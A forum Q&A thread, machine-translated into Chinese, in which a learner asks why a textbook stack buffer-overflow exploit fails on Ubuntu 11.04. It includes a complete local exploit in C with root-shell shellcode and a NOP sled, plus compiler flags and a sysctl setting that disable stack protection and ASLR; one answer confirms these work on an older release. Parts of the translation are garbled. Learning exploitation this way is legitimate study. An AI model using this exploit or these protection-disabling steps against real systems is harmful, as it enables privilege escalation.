在Ubuntu中禁用堆栈碎片保护11.04

Question

我在2007年的MacBook上运行32位Ubuntu 11.04，并且我刚开始学习缓冲区溢出漏洞。我试图从书中运行示例程序，但是Ubuntu的安全措施使我无法成功执行缓冲区溢出。下面是我试图运行代码：

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 
"\xe1\xcd\x80"; 

int main(int argc, char *argv[]) { 
    unsigned int i, *ptr, ret, offset=270; 
    char *command, *buffer; 

    command = (char *) malloc(200); 
    bzero(command, 200); // zero out the new memory 

    strcpy(command, "./notesearch \'"); // start command buffer 
    buffer = command + strlen(command); // set buffer at the end 

    if(argc > 1) // set offset 
     offset = atoi(argv[1]); 

    ret = (unsigned int) &i - offset; // set return address 

    for(i=0; i < 160; i+=4) // fill buffer with return address 
     *((unsigned int *)(buffer+i)) = ret; 
    memset(buffer, 0x90, 60); // build NOP sled 
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

    strcat(command, "\'"); 

    system(command); // run exploit 
    free(command); 
} 

我想导致段错误的代码，但我每次运行它时，它与“德艺双馨检测栈”的错误退出。我试着用以下选项编译（使用gcc）：

-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack 

以各种组合，以及所有在一起。我也尝试$ sysctl -w kernel.randomize_va_space=0，然后重新编译，但没有成功。

请将任何人都可以在执行缓冲区溢出的正确方法是揭示大加赞赏，因为Ubuntu的内置安全措施

Answer 1

我对现在发生的事情有了更多的了解。给定的代码构造一个缓冲区，然后将其传递给一个名为notesearch的程序，该程序存在缓冲区溢出漏洞。我没有弄清楚如何禁用当前版本的ubuntu的保护措施，但我尝试的方法在我的Ubuntu 9.10虚拟机上工作。也就是说，-fno-stack-protector作为gcc标志工作，当与sysctl kernel.randomize_va_space = 0配对时，允许在堆栈上执行shellcode的缓冲区溢出。有点解决方法，但运行我的虚拟机很适合我，并允许我继续阅读本书中的示例。如果你有兴趣学习漏洞，这本书是一本很棒的书。 Here it is

Answer 2

你确定你传递-fno-堆栈保护的正确的gcc调用？给定的代码似乎没有缓冲区溢出。